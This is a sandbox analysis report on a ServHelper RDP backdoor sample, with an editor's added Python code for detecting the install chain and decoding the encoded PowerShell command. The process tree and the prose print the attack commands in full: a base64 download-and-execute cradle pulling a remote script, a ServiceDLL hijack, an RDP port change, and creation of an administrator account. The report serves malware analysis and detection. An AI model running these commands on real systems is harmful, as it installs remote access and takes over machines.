Analysis
- max time kernel: 134s
- max time network: 122s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 11-06-2021 14:59

Static task: static1
Behavioral task: behavioral1 (Sample 20f307c716a689f4afa3a76b7143db22.exe, Resource win7v20210408)
Behavioral task: behavioral2 (Sample 20f307c716a689f4afa3a76b7143db22.exe, Resource win10v20210408)

General
- Target: 20f307c716a689f4afa3a76b7143db22.exe
- Size: 6.0MB
- MD5: 20f307c716a689f4afa3a76b7143db22
- SHA1: 2fd6796fd158c93b14654240533511af6fec03e5
- SHA256: 3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
- SHA512: 0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b

Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the threat group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoC)
  flow 11, pid 1388, powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  pid 1960 icacls.exe; pid 2000 icacls.exe; pid 576 icacls.exe; pid 1212 icacls.exe; pid 860 icacls.exe; pid 1064 takeown.exe; pid 1856 icacls.exe; pid 1216 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule "upx" matched: \Windows\Branding\mediasrv.png; \Windows\Branding\mediasvc.png
- Loads dropped DLL (2 IoCs)
  pid 956; pid 956
- Modifies file permissions (1 TTP, 8 IoCs)
  pid 2000 icacls.exe; pid 576 icacls.exe; pid 1212 icacls.exe; pid 860 icacls.exe; pid 1064 takeown.exe; pid 1856 icacls.exe; pid 1216 icacls.exe; pid 1960 icacls.exe
- Drops file in System32 directory (1 IoC)
  File created: C:\Windows\system32\rfxvmt.dll (powershell.exe)
- Drops file in Windows directory (21 IoCs, all by powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d175d3c-1d85-4cc9-bd2c-60bcb8b8249e
  File created: C:\Windows\branding\mediasrv.png
  File created: C:\Windows\branding\wupsvc.jpg
  File opened for modification: C:\Windows\branding\ShellBrd
  File opened for modification: C:\Windows\branding\mediasrv.png
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a9f49bf-6bae-4dbb-a3f9-d367fa7074df
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f00c55de-be40-4e29-9aee-b7c8e48d36ac
  File created: C:\Windows\branding\mediasvc.png
  File opened for modification: C:\Windows\branding\mediasvc.png
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZVOUCCAZ1MOW2DRW7QQM.temp
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5590c60-3c66-47a1-9389-a032b558775e
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e801fb25-a40e-4f38-8bf8-b40f5dd3f0db
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7ec28881-297a-4c37-a8a3-5fd028925067
  File opened for modification: C:\Windows\branding\Basebrd
  File opened for modification: C:\Windows\branding\wupsvc.jpg
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e39fe1fb-6171-4196-be45-dcb4150bcb96
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0b3f6521-2646-42cf-95b9-c45dd35dbe0f
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46e76794-119b-4abc-b2f5-5e19a5f0da72
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e60513dd-6f76-4617-a0f5-a616047d9436
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e80b161c-a211-44b5-ada6-46683a45d207
- Modifies data under HKEY_USERS (4 IoCs)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
  Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0fd42b5e35ed701 (powershell.exe)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  pid 1708 powershell.exe; 1708 powershell.exe; 1768 powershell.exe; 1768 powershell.exe; 1008 powershell.exe; 1008 powershell.exe; 1672 powershell.exe; 1672 powershell.exe; 1708 powershell.exe; 1708 powershell.exe; 1708 powershell.exe; 1388 powershell.exe; 1388 powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  pid 468; 956; 956; 956; 956
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  SeDebugPrivilege 1708 powershell.exe; SeDebugPrivilege 1768 powershell.exe; SeDebugPrivilege 1008 powershell.exe; SeDebugPrivilege 1672 powershell.exe; SeRestorePrivilege 1216 icacls.exe; SeAssignPrimaryTokenPrivilege 1684 WMIC.exe; SeIncreaseQuotaPrivilege 1684 WMIC.exe; SeAuditPrivilege 1684 WMIC.exe; SeAssignPrimaryTokenPrivilege 1684 WMIC.exe; SeIncreaseQuotaPrivilege 1684 WMIC.exe; SeAuditPrivilege 1684 WMIC.exe; SeAssignPrimaryTokenPrivilege 1072 WMIC.exe; SeIncreaseQuotaPrivilege 1072 WMIC.exe; SeAuditPrivilege 1072 WMIC.exe; SeAssignPrimaryTokenPrivilege 1072 WMIC.exe; SeIncreaseQuotaPrivilege 1072 WMIC.exe; SeAuditPrivilege 1072 WMIC.exe; SeDebugPrivilege 1388 powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs; source pid and image -> target pid and image, each recorded three times unless noted)
  1100 20f307c716a689f4afa3a76b7143db22.exe -> 1708 powershell.exe
  1708 powershell.exe -> 1288 csc.exe
  1288 csc.exe -> 1160 cvtres.exe
  1708 powershell.exe -> 1768 powershell.exe
  1708 powershell.exe -> 1008 powershell.exe
  1708 powershell.exe -> 1672 powershell.exe
  1708 powershell.exe -> 1064 takeown.exe
  1708 powershell.exe -> 1856 icacls.exe
  1708 powershell.exe -> 1216 icacls.exe
  1708 powershell.exe -> 1960 icacls.exe
  1708 powershell.exe -> 2000 icacls.exe
  1708 powershell.exe -> 576 icacls.exe
  1708 powershell.exe -> 1212 icacls.exe
  1708 powershell.exe -> 860 icacls.exe
  1708 powershell.exe -> 1744 reg.exe
  1708 powershell.exe -> 1256 reg.exe
  1708 powershell.exe -> 1116 reg.exe
  1708 powershell.exe -> 1700 net.exe
  1700 net.exe -> 1684 net1.exe
  1708 powershell.exe -> 2028 cmd.exe
  2028 cmd.exe -> 456 cmd.exe
  456 cmd.exe -> 300 net.exe (recorded once)
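Read together, the signatures above describe one install of an RDP backdoor rather than unrelated oddities: TermService's ServiceDLL is pointed at a file in \Windows\branding named like an image, the RDP listener is moved to 0x1C21 (7201), fEnableWddmDriver is switched off, rfxvmt.dll is dropped into System32 and re-owned to TrustedInstaller, NETWORK SERVICE (SID S-1-5-20, the account whose HKEY_USERS hive is modified) is added to Administrators, and a local account is created and placed in Remote Desktop Users. The following detection logic is an added example written by the editor, not code from the sandbox, the report or ServHelper. It runs over constructed process-creation events; the command lines are copied from the process tree below, while the event schema (pid, ppid, cmdline), the parent pid 9000 for the later net.exe roots, and pids 9001-9002, 4000 and 4242 are assumptions made for the sample.

```python
"""Detection rules for the RDP-backdoor install chain in this report. Added example by the
editor, not code from the sandbox, the report or ServHelper. ProcEvent(pid, ppid, cmdline) is a
hypothetical minimal schema (map it from Sysmon event 1 or your EDR's process-creation events);
command lines in SAMPLE_EVENTS are copied from this report's process tree, pids 9000-9002, 4000
and 4242 are invented."""
import shlex
from collections import defaultdict, namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid cmdline")
Finding = namedtuple("Finding", "rule pid ppid detail")
SENSITIVE_GROUPS = {"administrators", "remote desktop users"}

def tokenize(cmdline):
    """Windows-style split: backslashes stay literal, quotes around a token are dropped."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: degrade to a whitespace split
        toks = cmdline.split()
    return [t.strip('"\'') for t in toks]

def _tool(toks, *names):  # True when the command's image basename is one of names
    return bool(toks) and toks[0].rsplit("\\", 1)[-1].lower() in names

def _after(toks, switch):  # value following a reg.exe switch such as /v or /d (case-insensitive)
    low = [t.lower() for t in toks]
    i = low.index(switch) if switch in low else len(toks)
    return toks[i + 1] if i + 1 < len(toks) else ""

def _reg_add(toks):
    return _tool(toks, "reg", "reg.exe") and len(toks) > 2 and toks[1].lower() == "add"

def rule_service_dll(toks):
    # ServiceDLL rewritten to anything that is not a .dll under System32 (here a .png in \Windows\branding)
    if _reg_add(toks) and "\\services\\" in toks[2].lower() and _after(toks, "/v").lower() == "servicedll":
        val = _after(toks, "/d")
        if not (val.lower().endswith(".dll") and "\\system32\\" in val.lower()):
            return f"ServiceDLL of {toks[2]} -> {val}"
    return None

def rule_rdp_port(toks):
    if _reg_add(toks) and "winstations\\rdp-tcp" in toks[2].lower() and _after(toks, "/v").lower() == "portnumber":
        raw = _after(toks, "/d")
        try:
            port = int(raw, 0)  # reg.exe takes hex (0x1C21) or decimal
        except ValueError:
            return f"RDP PortNumber set to unparsable value {raw!r}"
        if port != 3389:
            return f"RDP listener moved from 3389 to {port} (raw {raw})"
    return None

def rule_rdp_wddm(toks):
    if _reg_add(toks) and _after(toks, "/v").lower() == "fenablewddmdriver" and _after(toks, "/d") == "0":
        return "fEnableWddmDriver=0 (WDDM display driver disabled for RDP sessions)"
    return None

def rule_net_account(toks):
    # net user ... /add and net localgroup <sensitive group> ... /add, via net.exe or net1.exe
    low = [t.lower() for t in toks]
    if _tool(toks, "net", "net.exe", "net1", "net1.exe") and len(toks) > 3 and "/add" in low:
        if low[1] == "localgroup" and low[2] in SENSITIVE_GROUPS:
            return f"{toks[3]} added to {toks[2]}"
        if low[1] == "user":
            return f"local account {toks[2]} created"
    return None

def rule_dll_acl(toks):
    # takeown/icacls aimed at a DLL: the report re-owns rfxvmt.dll to TrustedInstaller so it looks untouched
    if _tool(toks, "icacls", "icacls.exe", "takeown", "takeown.exe") and any(t.lower().endswith(".dll") for t in toks[1:]):
        return " ".join(toks)
    return None

RULES = {"service_dll_hijack": rule_service_dll, "rdp_port_change": rule_rdp_port, "rdp_wddm_disabled": rule_rdp_wddm,
         "local_account_change": rule_net_account, "system_dll_acl_tamper": rule_dll_acl}

def scan(events):
    out = []
    for ev in events:
        toks = tokenize(ev.cmdline)
        out += [Finding(name, ev.pid, ev.ppid, d) for name, rule in RULES.items() for d in [rule(toks)] if d]
    return out

def chains(findings, min_rules=3):
    # parents whose children tripped >= min_rules distinct rules: one process drove the whole install
    by_parent = defaultdict(set)
    for f in findings:
        by_parent[f.ppid].add(f.rule)
    return {p: sorted(r) for p, r in by_parent.items() if len(r) >= min_rules}

SAMPLE_EVENTS = [  # children of powershell.exe pid 1708, command lines as in the report
    ProcEvent(1216, 1708, r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"'),
    ProcEvent(1744, 1708, r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'),
    ProcEvent(1256, 1708, r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'),
    ProcEvent(1116, 1708, r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'),
    ProcEvent(1700, 1708, r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'),
    ProcEvent(9001, 9000, r'net.exe user wgautilacc cjzofg0a /add'),  # the later net.exe roots; pids invented
    ProcEvent(9002, 9000, r'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD'),
    ProcEvent(4242, 4000, r'reg.exe query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber'),  # benign control
]
```

Calling `scan(SAMPLE_EVENTS)` yields one finding per matching child; `chains(...)` then reports parent 1708 with all five rules, while the invented parent 9000 stays below the three-rule threshold (it only trips `local_account_change`) and the benign `reg query` produces nothing. Each rule is deliberately narrow: a port change is only reported when the parsed value differs from 3389, and a ServiceDLL write is only reported when the target is not a `.dll` under System32, so routine administration does not page anyone.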
Processes
Indented by process depth. Each entry gives the image path, then the observed command line, then the signatures that entry triggered.

- C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe
  "C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA489.tmp" "c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          net start rdpdr
          - C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - C:\Windows\system32\cmd.exe
        cmd /c net start TermService
        - C:\Windows\system32\net.exe
          net start TermService
          - C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc Ghar4f5 /del
  - C:\Windows\system32\net.exe
    net.exe user wgautilacc Ghar4f5 /del
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc cjzofg0a /add
  - C:\Windows\system32\net.exe
    net.exe user wgautilacc cjzofg0a /add
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc cjzofg0a /add
- C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  - C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
  - C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
- C:\Windows\System32\cmd.exe
  cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  - C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  cmd /C net.exe user wgautilacc cjzofg0a
  - C:\Windows\system32\net.exe
    net.exe user wgautilacc cjzofg0a
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc cjzofg0a
- C:\Windows\System32\cmd.exe
  cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    wmic CPU get NAME
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  cmd.exe /C net user wgautilacc 1234
  - C:\Windows\system32\net.exe
    net user wgautilacc 1234
    - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user wgautilacc 1234
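The powershell.exe entry near the bottom of the tree is the one the sandbox flags as a blocklisted process making a network request. Its -enc argument is base64 over the UTF-16LE text of the script, which is why the URL in Malware Config can be extracted from the command line alone. The block below is an added example written by the editor, not code from the report or the sandbox: ENCODED is the exact payload from that command line, and the decoder, URL extraction and cradle check are the editor's own. It also handles the cases that trip naive decoders: stripped base64 padding, the short -e/-ec aliases PowerShell accepts for -EncodedCommand, and tokens that do not decode cleanly.

```python
"""Decode the -enc payload in this report's process tree and pull out the download URL.

Added example by the editor, not part of the sandbox report. ENCODED is the exact
base64 string from the powershell.exe command line in the report; SAMPLE_CMDLINE is the
cmd.exe wrapper from the same tree. The helpers are the editor's own.
"""
import base64
import re

ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)
SAMPLE_CMDLINE = "cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENCODED

_URL = re.compile(r"""https?://[^\s'"()<>]+""")
_CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr|start-bitstransfer)\b")


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over the UTF-16LE script text; re-add padding if it was stripped."""
    b64 = b64.strip()
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_encoded_commands(cmdline):
    """Return every decoded -EncodedCommand payload in a command line.

    powershell.exe accepts any prefix of the parameter name (-e, -ec, -enc, ...), so the
    flag is matched by prefix; -ep (ExecutionPolicy) is not a prefix and is left alone.
    Tokens that are not valid base64 / UTF-16LE are skipped rather than raising."""
    toks = cmdline.split()
    decoded = []
    for flag, value in zip(toks, toks[1:]):
        name = flag[1:].lower()
        if flag[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                decoded.append(decode_encoded_command(value))
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                continue
    return decoded


def triage(cmdline):
    """Decoded scripts, URLs they reference, and whether they look like a download cradle."""
    decoded = extract_encoded_commands(cmdline)
    return {
        "decoded": decoded,
        "urls": [u for script in decoded for u in _URL.findall(script)],
        "download_cradle": any(_CRADLE.search(s) for s in decoded),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    for script in result["decoded"]:
        print("decoded:", script)
    print("urls:", result["urls"], "cradle:", result["download_cradle"])
```

For this report the decoded text is a one-line download cradle, `IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")`, which matches the URL in Malware Config. The same function applied to the `-ep bypass` switch returns nothing, so it can be run over every PowerShell command line in a log without hand-filtering first.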
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0042da65-6a0d-444e-9182-5657141093a5
  MD5: 6f0d509e28be1af95ba237d4f43adab4
  SHA1: c665febe79e435843553bee86a6cea731ce6c5e4
  SHA256: f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
  SHA512: 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01beae65-39e3-4a60-a039-e3a50d156d50
  MD5: e5b3ba61c3cf07deda462c9b27eb4166
  SHA1: b324dad73048be6e27467315f82b7a5c1438a1f9
  SHA256: b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
  SHA512: a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_059a5047-28df-458f-9a3f-70af485306fb
  MD5: d89968acfbd0cd60b51df04860d99896
  SHA1: b3c29916ccb81ce98f95bbf3aa8a73de16298b29
  SHA256: 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
  SHA512: b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2a69743f-de4c-4302-88b9-02014f035850
  MD5: faa37917b36371249ac9fcf93317bf97
  SHA1: a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
